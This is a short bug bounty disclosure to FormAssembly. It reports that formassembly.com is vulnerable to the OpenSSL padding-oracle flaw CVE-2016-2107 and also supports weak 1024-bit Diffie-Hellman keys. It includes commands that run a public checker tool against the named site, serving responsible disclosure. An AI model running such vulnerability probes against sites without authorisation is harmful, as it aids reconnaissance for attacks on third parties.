Dear Formassembly bug bounty team,
formassembly.com is vulnerable to CVE-2016-2107, allowing remote attackers to obtain sensitive information via padding-oracle attacks.
$ git clone https://github.com/FiloSottile/CVE-2016-2107.git
$ go run main.go www.formassembly.com
... Vulnerable: true
The code above checks whether the TLS alert is DATA_LENGTH_TOO_LONG
(vulnerable) or BAD_RECORD_MAC
(not vulnerable).
Filippo Valsorda, the author of the tool I used to discover this issue, wrote a fantastic article on CVE-2016-2107 here: https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/
During the decryption and the HMAC verification process the length of the padding is revealed. Padding-oracle attacks iterate over the padding of the cryptographic message, revealing the contents of the message.
While I am at it I may as well let you know that you also support 1024-bit Diffie-Hellman keys. I would recommend using a 2048-bit Diffie-Hellman group.
Link to GitHub repo: https://github.com/FiloSottile/CVE-2016-2107
Link to online test: https://filippo.io/CVE-2016-2107/
Yours sincerely,
Ed